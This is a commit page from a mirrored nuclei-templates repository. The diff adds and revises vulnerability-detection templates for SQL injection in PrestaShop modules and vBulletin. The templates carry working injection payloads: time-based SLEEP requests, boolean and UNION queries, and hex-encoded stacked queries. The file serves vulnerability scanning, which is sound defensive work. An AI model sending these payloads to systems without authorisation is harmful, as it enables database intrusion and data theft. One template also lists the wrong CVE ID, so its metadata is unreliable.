daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Optimized some templates due nuclei change and added new templates

patch-12
mastercho 2024-07-14 19:15:12 +03:00
parent af2f5ade84
commit 425e6e7c99
17 changed files with 240 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
http/cves/2015/CVE-2015-4455.yaml
View File

@ -48,6 +48,7 @@ http:
{{randstr}}
--a54906fe12c504cb01ca836d062f82fa--
host-redirects: true
matchers:
- type: dsl
dsl:

2
http/cves/2016/CVE-2016-6195.yaml
View File

@ -43,7 +43,7 @@ http:
- "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
stop-at-first-match: true
host-redirects: true
matchers-condition: and
matchers:
- type: word

4
http/cves/2019/CVE-2019-7139.yaml
View File

@ -24,11 +24,11 @@ http:
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 12s
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
host-redirects: true
matchers-condition: or
matchers:
- type: dsl

28
http/cves/2022/CVE-2022-22897.yaml
View File

@ -34,9 +34,7 @@ info:
http:
- raw:
- |
GET /modules/appagebuilder/config.xml HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 12s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@ -60,28 +58,22 @@ http:
X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI
extractors:
- type: regex
name: version
part: body_1
internal: true
group: 1
regex:
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=6'
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
- 'duration_1>=6'
- 'status_code_1 == 200 && contains(base64(body_1), "eyJwcm9kdWN0X29uZV9pbWciOltdfQ==")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
- 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")'
- '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")'
- 'len(body_3) > 200 && len(body_4) <= 22'
- 'status_code_1 == 200 && contains(base64(body_1), "eyJwcm9kdWN0X29uZV9pbWciOltdfQ==")'
- 'contains(body_2, "content") && contains(body_2, "{{Hostname}}")'
- '!contains(body_3, "content") && !contains(body_3, "{{Hostname}}")'
- 'len(body_2) > 200 && len(body_3) <= 22'
condition: and

8
http/cves/2023/CVE-2023-27034.yaml
View File

@ -67,16 +67,16 @@ http:
submitComment=
------------YWJkMTQzNDcw--
- |
GET /modules/jmsblog/config.xml HTTP/1.1
GET / HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'contains(body_2, "Jms Blog")'
- 'contains(body_2, "jmsblog")'
condition: and
# digest: 4a0a00473045022100b9f9b8cc6b64a6d4a7f59d009c1b93c8e00bf31220947f1984254c5ffda4601c022017fb76e27e4d3550f19969a20b834066f6ed8bca4aa11e7fbde5f3b6122e0068:922c64590222798bb761d5b6d8e72950

83
http/cves/2023/CVE-2023-27847.yaml Normal file
View File

@ -0,0 +1,83 @@
id: CVE-2023-27847
info:
name: PrestaShop xipblog SQL Injection
author: mastercho
severity: critical
description: |
In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27847
- https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27847
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
redirects: true
max-redirects: 3
framework: prestashop
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,unauth,xipblog
http:
- raw:
- |
@timeout: 20s
GET / HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562),NULL,NULL--+- HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
stop-at-first-match: true
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=5'
- 'status_code_1 == 200 && contains(body_1, "xipblog")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_1 == 200 && contains(body_1, "xipblog")'
- 'contains(body_3, "kr_blog_post_area")'
- '!contains(body_4, "kr_blog_post_area")'
condition: and
- type: dsl
name: union-based
dsl:
- 'status_code_1 == 200 && contains(body_1, "xipblog")'
- 'contains(body_5, "c8c605999f3d8352d7bb792cf3fdb25b")'
condition: and

2
http/cves/2023/CVE-2023-30150.yaml
View File

@ -38,9 +38,11 @@ http:
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 12s
GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:

62
http/cves/2023/CVE-2023-39650.yaml Normal file
View File

@ -0,0 +1,62 @@
id: CVE-2023-39650
info:
name: PrestaShop Theme Volty CMS Blog SQL Injection
author: mastercho
severity: critical
description: |
In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27847
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
redirects: true
max-redirects: 3
framework: prestashop
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog
http:
- raw:
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_1>=5'
- 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
- 'status_code_2 == 200 && status_code_3 == 302'
condition: and

3
http/cves/2023/CVE-2023-45375.yaml
View File

@ -16,12 +16,15 @@ info:
http:
- raw:
- |
@timeout: 12s
POST /module/pireospay/validation HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: dsl

2
http/cves/2023/CVE-2023-46347.yaml
View File

@ -36,6 +36,8 @@ http:
search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:

53
http/cves/2024/CVE-2024-36683.yaml Normal file
View File

@ -0,0 +1,53 @@
id: CVE-2024-36683
info:
name: PrestaShop productsalert SQL Injection
author: mastercho
severity: critical
description: |
In the module “Products Alert” (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36683
- https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-36683
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
redirects: true
max-redirects: 3
framework: prestashop
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,unauth,productsalert
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158
stop-at-first-match: true
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=5'
- 'status_code_1 == 200 && contains(body_1, "modules/productsalert")'
condition: and

2
http/exposed-panels/openbullet2-panel.yaml
View File

@ -28,6 +28,8 @@ http:
- type: word
words:
- "<title>OpenBullet2</title>"
- "<title>Openbullet2WebClient</title>"
condition: or
- type: status
status:

10
http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
View File

@ -10,26 +10,28 @@ info:
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/#pll_switcher
metadata:
verified: true
max-request: 1
shodan-query: http.component:"Prestashop"
tags: prestashop,sqli
http:
- raw:
- |
@timeout: 12s
POST /m/apmarketplace/passwordrecovery HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
email=" AND (SELECT 3472 FROM (SELECT(SLEEP(6)))UTQK)-- IGIe&submit_reset_pwd=
email="+AND+(SELECT+3472+FROM+(SELECT(SLEEP(6)))UTQK)--+IGIe&submit_reset_pwd=
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'contains(body, "module-apmarketplace-passwordrecovery")'
- 'duration_1>=6'
- 'contains(body_1, "module-apmarketplace-passwordrecovery")'
condition: and
# digest: 4b0a00483046022100b48440bd6c3340453db529a4aa26ebfc2720ca154ed673b86253139e316d9fa3022100c353a472d66ba11b085155b28ee58f92dce4988e04ba847f68aefa70fd759a4d:922c64590222798bb761d5b6d8e72950

2
http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml
View File

@ -57,6 +57,8 @@ http:
GET /upload/{{filename}}.html HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word

2
http/vulnerabilities/vbulletin/arcade-php-sqli.yaml
View File

@ -19,6 +19,8 @@ http:
path:
- "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'"
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word

3
http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml
View File

@ -21,12 +21,15 @@ info:
http:
- raw:
- |
@timeout: 12s
POST /ajax.php?do=inforum&listforumid=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&result=10 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
undefined&s=&securitytoken=guest
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:

2
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
View File

@ -23,6 +23,8 @@ http:
contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word